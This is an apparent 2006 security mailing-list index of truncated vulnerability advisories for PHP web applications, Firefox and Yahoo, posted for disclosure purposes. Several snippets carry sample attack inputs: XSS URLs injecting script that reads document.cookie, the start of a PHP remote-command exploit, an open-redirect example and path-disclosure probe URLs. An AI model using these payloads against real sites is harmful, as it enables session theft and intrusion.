|
|
Colapse all |
Post message
PhpWebFTP 3.2 Login Script 2006-04-17 arko dhar gmail com Summary =============================================== phpWebFTP enables connections to FTP servers, even behind a firewall not allowing traffic. phpWebFTP bypasses the firewall by making a FTP connection from your webserver to the FTP server and transfering the files to your webclient over the h [ more ] [ reply ] Snipe Gallery <= 3.1.4 Multiple XSS 2006-04-15 qex bsdmail org Snipe Gallery <= 3.1.4 Multiple XSS http://www.[SITE].com/[PATH]/view.php?gallery_id='><script>alert(documen t.cookie)</script> http://www.[SITE].com/[PATH]/search.php?keyword='><script>alert(document .cookie)</script>&search_cat=&search_type=and http://www.[SITE].com/[PATH]/image.php?page=1&gallery_ [ more ] [ reply ] phpFaber TopSites Script Cross-Site Scripting 2006-04-15 botan linuxmail org Description : phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and mySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain your li [ more ] [ reply ] RE: osCommerce "extras/" information/source code disclosure 2006-04-15 Michael Scheidell (scheidell secnap net) > -----Original Message----- > From: rgod (at) autistici (dot) org [email concealed] [mailto:rgod (at) autistici (dot) org [email concealed]] > Sent: Friday, April 14, 2006 7:20 AM > To: bugtraq (at) securityfocus (dot) com [email concealed] > Subject: osCommerce "extras/" information/source code disclosure > > > ---- osCommerce <= 2.2 "extras/" information/source code > disclosur [ more ] [ reply ] PHP Album <= 0.3.2.3 remote commnads execution 2006-04-15 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "PHP Album <= 0.3.2.3 remote cmmnds xctn\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "-> this works with magic_quotes_gpc=Off & register_globals=On\r\n"; echo "dork: \"powered by php photo album\" - [ more ] [ reply ] [SECURITY] [DSA 1035-1] New fcheck packages fix insecure temporary file creation 2006-04-15 Moritz Muehlenhoff (jmm debian org) [eVuln] aWebBB Multiple XSS and SQL Injection Vulnerabilities 2006-04-15 alex evuln com New eVuln Advisory: aWebBB Multiple XSS and SQL Injection Vulnerabilities http://evuln.com/vulns/117/summary.html --------------------Summary---------------- eVuln ID: EV0117 CVE: CVE-2006-1637 CVE-2006-1638 Software: aWebBB Sowtware's Web Site: http://labs.aweb.com.au/ Versions: 1.2 Critical Level [ more ] [ reply ] [KAPDA]CopperminePhotoGallery1.4.4~ PluginInclusionSystem(index.php)~ RemoteFileInclusion attack 2006-04-15 addmimistrator gmail com (1 replies) ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/copperminephotogallery144-pluginin clusionsystemindexphp-remotefileinclusion-attack.html ??????-Summary?????- Software: CPG Coppermine Photo Gallery Sowtware?s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.4.stable Class: Remote St [ more ] [ reply ] Re: [KAPDA]CopperminePhotoGallery1.4.4~ PluginInclusionSystem(index.php)~ RemoteFileInclusion attack 2006-04-16 Dariusz Kolasinski (ofi evil net pl) [KAPDA]MyBB1.1.0~global.php~ParameterExtracting 2006-04-15 addmimistrator gmail com ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/mybb110globalphpparameterextractin g.html ??????-Summary?????- Software: MyBB Sowtware?s Web Site: http://www.mybboard.com Versions: 1.1.0 Class: Remote Status: Unpatched Exploit: Available Solution: Available Discovered by: imei addmimistrator [ more ] [ reply ] ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability 2006-04-15 zdi-disclosures 3com com ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-010.html April 13, 2006 -- CVE ID: CVE-2006-1730 -- Affected Vendor: Mozilla -- Affected Products: Mozilla 1.7.x and below Firefox 1.5.x and below -- TippingPoint(TM) IPS [ more ] [ reply ] Re: QuickBlogger v1.4 Cross-Site Scripting 2006-04-14 Steven M. Christey (coley mitre org) This is yet another case where XSS is resultant from a more serious issue. The primary issue here involves local file inclusion. retrogod-style attacks might be feasible by injecting PHP code into text-based data files within the application, then including those text files using this issue; howev [ more ] [ reply ] Dokeos 1.6.4 SQL Injection Vulnerability 2006-04-11 Alvaro Olavarria (aolavarria secure cl) Dokeos 1.6.4 SQL Injection Vulnerability Author: Alvaro Olavarria <aolavarria (at) secure (dot) cl [email concealed]> Affected: Dokeos <= 1.6.4 Status: Notified hereby Vendor url: http://www.dokeos.com Background. Dokeos is an Open Source elearning and course management web application translated in 34 languages and helpi [ more ] [ reply ] a Yahoo Vulnerability 2006-04-12 r57shell gmail com /* Advisory */ Homepage: http://www.yahoo.com Found by: Tontonq a.k.a Tontong /* Impact */ This vulnerability can be used to refresh to fake mail /* Credits */ All SpyMS Userz WwW.SpyMasterSnake.org */ Credits /* example: http://login.yahoo.com/config/login?.src=fpctx&.done=http://yourfakemail [ more ] [ reply ] |
|
Privacy Statement |
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
http://www.site.com/DbbS/to
[ more ] [ reply ]